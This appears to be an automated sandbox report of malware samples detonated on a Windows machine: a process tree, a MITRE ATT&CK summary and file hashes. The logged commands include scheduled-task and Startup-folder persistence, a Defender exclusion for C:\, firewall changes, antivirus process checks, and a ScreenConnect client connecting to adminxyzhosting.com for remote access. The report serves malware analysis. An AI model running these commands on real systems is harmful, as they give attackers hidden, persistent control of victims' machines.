C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=25972 -childID 111 -isForBrowser -prefsHandle 26016 -prefMapHandle 26024 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {591da95a-8467-4f7b-b14a-4c2131c24aa6} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6904
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=26176 -childID 112 -isForBrowser -prefsHandle 26184 -prefMapHandle 26188 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {162dfa34-9071-4b00-b9be-e4443c324e20} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6916
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=26392 -childID 113 -isForBrowser -prefsHandle 26468 -prefMapHandle 26464 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fb8c959d-04ab-4cdb-9d49-4306161c6e14} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6928
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=26596 -childID 114 -isForBrowser -prefsHandle 26604 -prefMapHandle 26608 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {14cc0df4-fcf5-4fc9-a497-27c68c42763e} 4588 "\\.\pipe\gecko-crash-server-pipe.4588" tab4⤵PID:6940
-
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:5664
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:5480
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵PID:4232
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"3⤵
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
PID:5176 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1732 -parentBuildID 20240401114208 -prefsHandle 1672 -prefMapHandle 1664 -prefsLen 20321 -prefMapSize 241207 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6d453811-ab67-44ca-b250-3396d7c97e7e} 5176 "\\.\pipe\gecko-crash-server-pipe.5176" gpu4⤵PID:7368
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2096 -parentBuildID 20240401114208 -prefsHandle 2088 -prefMapHandle 2084 -prefsLen 20321 -prefMapSize 241207 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {eae71997-26e7-495d-a685-005aac4e8367} 5176 "\\.\pipe\gecko-crash-server-pipe.5176" socket4⤵PID:13008
-
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /02⤵
- Checks SCSI registry key(s)
PID:7228
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /02⤵
- Checks SCSI registry key(s)
PID:8220
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /02⤵PID:5964
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /13⤵PID:15308
-
-
-
C:\Users\Admin\Desktop\mal-1\Files\XSploitLauncher.exe"C:\Users\Admin\Desktop\mal-1\Files\XSploitLauncher.exe"2⤵PID:6764
-
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"3⤵PID:11388
-
-
-
C:\Windows\System32\NOTEPAD.EXE"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Advanced.cmd2⤵
- Opens file in notepad (likely ransom note)
PID:2752
-
-
C:\Windows\SysWOW64\cmd.execmd /c schtasks.exe /create /tn "Appear" /tr "wscript //B 'C:\Users\Admin\AppData\Local\InfoLink Dynamics\InfoForge.js'" /sc minute /mo 5 /F2⤵PID:2088
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /tn "Appear" /tr "wscript //B 'C:\Users\Admin\AppData\Local\InfoLink Dynamics\InfoForge.js'" /sc minute /mo 5 /F3⤵
- Scheduled Task/Job: Scheduled Task
PID:9568
-
-
-
C:\Windows\SysWOW64\cmd.execmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InfoForge.url" & echo URL="C:\Users\Admin\AppData\Local\InfoLink Dynamics\InfoForge.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InfoForge.url" & exit2⤵PID:8316
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Hospital.cmd"2⤵PID:9432
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7432
-
-
C:\Windows\system32\findstr.exefindstr /I "opssvc wrsa"3⤵PID:13996
-
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:13340
-
-
C:\Windows\system32\findstr.exefindstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"3⤵PID:6620
-
-
C:\Windows\system32\cmd.execmd /c md 821213⤵PID:5940
-
-
C:\Windows\system32\extrac32.exeextrac32 /Y /E Sd3⤵PID:6228
-
-
C:\Windows\system32\cmd.execmd /c copy /b 82121\Qui.com + Notre + Sheer + Danny + Testament + Prompt + Knee + Sucks + Hindu + Emperor + Pay + Higher + Runtime 82121\Qui.com3⤵PID:6272
-
-
C:\Windows\system32\cmd.execmd /c copy /b ..\Revision + ..\Ii + ..\Participants V3⤵PID:10168
-
-
C:\Users\Admin\AppData\Local\Temp\82121\Qui.comQui.com V3⤵PID:9240
-
-
C:\Windows\system32\choice.exechoice /d y /t 53⤵PID:14664
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\DcU1cPVuAIVV.bat"2⤵PID:9724
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\2SwbYxgHsSxv.bat"2⤵PID:9188
-
C:\Windows\system32\chcp.comchcp 650013⤵PID:3736
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:12776
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\39sNo12jHame.bat"2⤵PID:6316
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Hospital.cmd"2⤵PID:5720
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:12168
-
-
C:\Windows\system32\findstr.exefindstr /I "opssvc wrsa"3⤵PID:3384
-
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:8404
-
-
C:\Windows\system32\findstr.exefindstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"3⤵PID:10048
-
-
C:\Windows\system32\cmd.execmd /c md 821213⤵PID:12028
-
-
C:\Windows\system32\extrac32.exeextrac32 /Y /E Sd3⤵PID:5092
-
-
C:\Windows\system32\cmd.execmd /c copy /b 82121\Qui.com + Notre + Sheer + Danny + Testament + Prompt + Knee + Sucks + Hindu + Emperor + Pay + Higher + Runtime 82121\Qui.com3⤵PID:13796
-
-
C:\Windows\system32\cmd.execmd /c copy /b ..\Revision + ..\Ii + ..\Participants V3⤵PID:3732
-
-
C:\Users\Admin\AppData\Local\Temp\82121\Qui.comQui.com V3⤵PID:8980
-
-
C:\Windows\system32\choice.exechoice /d y /t 53⤵PID:9960
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\LQ8bqWs2srjw.bat"2⤵PID:9900
-
C:\Windows\system32\chcp.comchcp 650013⤵PID:10804
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:12712
-
-
-
C:\Users\Admin\AppData\Local\Temp\temp_304.exe"C:\Users\Admin\AppData\Local\Temp\temp_304.exe"2⤵PID:14908
-
C:\Users\Admin\AppData\Local\Temp\temp_304.exe"C:\Users\Admin\AppData\Local\Temp\temp_304.exe"3⤵PID:4520
-
-
-
C:\Users\Admin\AppData\Local\Temp\temp_333.exe"C:\Users\Admin\AppData\Local\Temp\temp_333.exe"2⤵PID:412
-
-
C:\Users\Admin\AppData\Local\Temp\mepc字c字n.exe"C:\Users\Admin\AppData\Local\Temp\mepc字c字n.exe"2⤵PID:7748
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe3⤵PID:15304
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath C:\4⤵
- Command and Scripting Interpreter: PowerShell
PID:11392
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Remove-MpPreference -ExclusionPath C:\4⤵PID:2344
-
-
-
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\FransescoPast.txt2⤵
- Opens file in notepad (likely ransom note)
PID:5304
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\SnlZhOu2q6Sc.bat"2⤵PID:7768
-
C:\Windows\system32\chcp.comchcp 650013⤵PID:9060
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6436
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"3⤵PID:7788
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:4736
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gVBsl568mo66.bat" "4⤵PID:6420
-
C:\Windows\system32\chcp.comchcp 650015⤵PID:11028
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost5⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:11624
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"5⤵PID:1076
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f6⤵
- Scheduled Task/Job: Scheduled Task
PID:8084
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sdQxXPm5BYUJ.bat" "6⤵PID:13528
-
C:\Windows\system32\chcp.comchcp 650017⤵PID:15192
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost7⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:14512
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"7⤵PID:9428
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f8⤵
- Scheduled Task/Job: Scheduled Task
PID:5172
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MEZCd2DaNHil.bat" "8⤵PID:13212
-
C:\Windows\system32\chcp.comchcp 650019⤵PID:1256
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost9⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7320
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"9⤵PID:8048
-
-
-
-
-
-
-
-
-
C:\Users\Admin\Desktop\mal-1\Files\svchost.exe"C:\Users\Admin\Desktop\mal-1\Files\svchost.exe"2⤵PID:8144
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77svchost" /tr '"C:\Users\Admin\AppData\Roaming\$77svchost.exe"' & exit3⤵PID:12112
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "$77svchost" /tr '"C:\Users\Admin\AppData\Roaming\$77svchost.exe"'4⤵
- Scheduled Task/Job: Scheduled Task
PID:11792
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp7D1E.tmp.bat""3⤵PID:8036
-
C:\Windows\system32\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
PID:9904
-
-
C:\Users\Admin\AppData\Roaming\$77svchost.exe"C:\Users\Admin\AppData\Roaming\$77svchost.exe"4⤵PID:12948
-
-
-
-
C:\Users\Admin\Desktop\mal-1\Files\defender64.exe"C:\Users\Admin\Desktop\mal-1\Files\defender64.exe"2⤵PID:14216
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f3⤵
- Scheduled Task/Job: Scheduled Task
PID:7464
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /02⤵PID:10800
-
-
C:\Users\Admin\Desktop\mal-2\a\systemetape.exe"C:\Users\Admin\Desktop\mal-2\a\systemetape.exe"2⤵PID:5592
-
C:\Users\Admin\AppData\Local\Temp\23e3360290\Gxtuum.exe"C:\Users\Admin\AppData\Local\Temp\23e3360290\Gxtuum.exe"3⤵PID:11460
-
-
-
C:\Users\Admin\Desktop\mal-2\a\systemsound.exe"C:\Users\Admin\Desktop\mal-2\a\systemsound.exe"2⤵PID:6512
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /02⤵PID:6216
-
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\melt.txt2⤵
- Opens file in notepad (likely ransom note)
PID:6740
-
-
C:\Users\Admin\AppData\Local\Temp\system.exe"C:\Users\Admin\AppData\Local\Temp\system.exe"2⤵PID:9292
-
-
C:\Users\Admin\AppData\Local\Temp\StUpdate.exe"C:\Users\Admin\AppData\Local\Temp\StUpdate.exe"2⤵PID:10616
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\StUpdate.exe" "StUpdate.exe" ENABLE3⤵
- Modifies Windows Firewall
PID:13168
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\StUpdate.exe"3⤵
- Modifies Windows Firewall
PID:7440
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\StUpdate.exe" "StUpdate.exe" ENABLE3⤵
- Modifies Windows Firewall
PID:6396
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"3⤵PID:12156
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe" "svchost.exe" ENABLE4⤵
- Modifies Windows Firewall
PID:7724
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\23e3360290\Gxtuum.exe"C:\Users\Admin\AppData\Local\Temp\23e3360290\Gxtuum.exe"2⤵PID:9160
-
-
C:\Users\Admin\AppData\Local\Temp\23e3360290\Gxtuum.exe"C:\Users\Admin\AppData\Local\Temp\23e3360290\Gxtuum.exe"2⤵PID:7260
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3404
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:3448
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3800
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3872
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3924
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵PID:3940
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵PID:4192
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵PID:4324
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3696
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:3528
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:2740
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5024
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:1476
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:3772
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
- Drops file in System32 directory
PID:4804
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:4768
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3960
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵PID:480
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:2500
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:2504
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
PID:3312 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 793FD9F804FA1D3B9BF5E457A2C3162D C2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:6040 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSIDBD0.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240770046 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:5960
-
-
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵PID:13680
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5624
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding DEFB091ACCEDBA4F1AB6A1051AE42AE42⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:13796
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding F1EDE5E5CA47B9093D9C7CF5A2564153 E Global\MSI00002⤵
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:11748
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
PID:4172
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k swprv1⤵PID:5420
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc1⤵
- Checks SCSI registry key(s)
PID:10444
-
C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.ClientService.exe"C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=adminxyzhosting.com&p=8041&s=fc9a36f6-0b08-4c34-9329-6be5ce396fa4&k=BgIAAACkAABSU0ExAAgAAAEAAQBVXsSEc%2bx9uXD3C%2f7hA6k%2bCkYq8qNt9ddXTDuk6xtcDXcigKgagdDrv%2fcdVObs%2b5PsIEqa3J7G2KVNlw%2fruJmp5gWKLUA7CGK0M2xYP%2fnHrh8PGKb6APgX8%2bMmK%2fRI%2fuG1ObyHzrZSA2zDxqMWtbhBTbrYOR9GzyZRtT2sHBbUlx41DAcKHlRcqgqrm7UWwNY1mXMg1RfS2uCkTVjdU3GL7AKxo9LZAF%2bNZ31xMPej0IfTdjxJIuBFFPQhiLUl3MrrnM%2bcDzOJ4R5qzkEDJux1InHPO4447uQgY2C%2fpH9XXbyUJCVvgFFCPS5LSQJiQ7CvgPW3fKiAsEahrr56vu2y&c=prv8&c=&c=&c=&c=&c=&c=&c="1⤵
- Sets service image path in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:12052 -
C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.WindowsClient.exe"C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.WindowsClient.exe" "RunRole" "23d09938-f9d9-40b2-9cb5-7edc9c9a7b98" "User"2⤵
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
PID:8500
-
-
C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.WindowsClient.exe"C:\Program Files (x86)\ScreenConnect Client (73a0227d089fe193)\ScreenConnect.WindowsClient.exe" "RunRole" "996919a7-f35e-4843-9cec-07a919c2792b" "System"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: AddClipboardFormatListener
PID:11996
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 11768 -ip 117681⤵PID:14704
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 6828 -ip 68281⤵PID:10460
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 9348 -ip 93481⤵PID:11680
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 6416 -ip 64161⤵PID:7616
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 720 -p 9188 -ip 91881⤵PID:7548
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 6264 -ip 62641⤵PID:8716
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 11756 -ip 117561⤵PID:12108
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 11528 -ip 115281⤵PID:11896
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 14584 -ip 145841⤵PID:11496
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 892 -ip 8921⤵PID:11700
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 10892 -ip 108921⤵PID:11180
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 6812 -ip 68121⤵PID:9992
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 784 -p 8484 -ip 84841⤵PID:13620
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5680 -ip 56801⤵PID:10020
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca1⤵PID:9224
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 7948 -ip 79481⤵PID:6772
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
4JavaScript
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Boot or Logon Autostart Execution
3Registry Run Keys / Startup Folder
2Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Component Object Model Hijacking
1Power Settings
1Pre-OS Boot
1Bootkit
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Access Token Manipulation
1Create Process with Token
1Boot or Logon Autostart Execution
3Registry Run Keys / Startup Folder
2Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Component Object Model Hijacking
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Access Token Manipulation
1Create Process with Token
1Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
2Disable or Modify System Firewall
1Indicator Removal
1Clear Windows Event Logs
1Modify Registry
4Pre-OS Boot
1Bootkit
1Virtualization/Sandbox Evasion
3Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
2Credentials In Files
2Discovery
Browser Information Discovery
1Peripheral Device Discovery
3Process Discovery
1Query Registry
9Remote System Discovery
1System Information Discovery
8System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Virtualization/Sandbox Evasion
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
213KB
MD58ff21b7c2798aae18c495a8d28edbddb
SHA1c0b1b556570474c2a7fce6f183cb2fce9716c379
SHA2563557b83bbe7f33651b45ce53d45e4ccb876cdd7c494b0b594e32411fc9ecdacd
SHA512b9f66961f7179bd8dd1262ca2baffa1216c3a59c6e392c8ba8cff3bffcef6202bc2cc0d23a247f8a77ab35ef4b9c55d9cf20c408626b29dfbbdce8178042c5fc
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
Filesize340B
MD57a142c66a8bd7387b36890c190cd36f7
SHA1844e9faf6ed5785aad180c6ec31046ac7ec6e4cf
SHA256500c4bd4da9e4e383c05f1ec25acd5d947c00073d4102c90c89059f643671639
SHA5129a8e70aca3a8e0bed879377508fca1f1fed71e13e5eb16c0b2585a0add3e7879f43a11d2011775c69bca0f98bc2ade5d26bcd6d6e8417a725f0e4d7619a845ee
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Filesize328B
MD5328ae2c5916c0bef4a85f2444004e244
SHA15e9ae2950d77df99f93fc09664937dba7da653d8
SHA25678192b8e80a00490dbebae3901e59107ab97d8dd6cac3d2c584b15cc46abdb3d
SHA5124bfdbb198e032b953098ef1154c9a7d8623c38262bfeaf8a74dafebd0d8f25945e8c7fe039be605a44c310daf393e18180099b610b0a48f2758513d1a6b2bbb1
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
Filesize330B
MD5b23cf305f98ef3d12abd34d18907f882
SHA1f61e44d0e69fece8ba06ce11f86c524feb576a58
SHA2561bed137aa6599fd8e2ce8ed420247e0048310ae991dedb1f24c4ea2be9a3a823
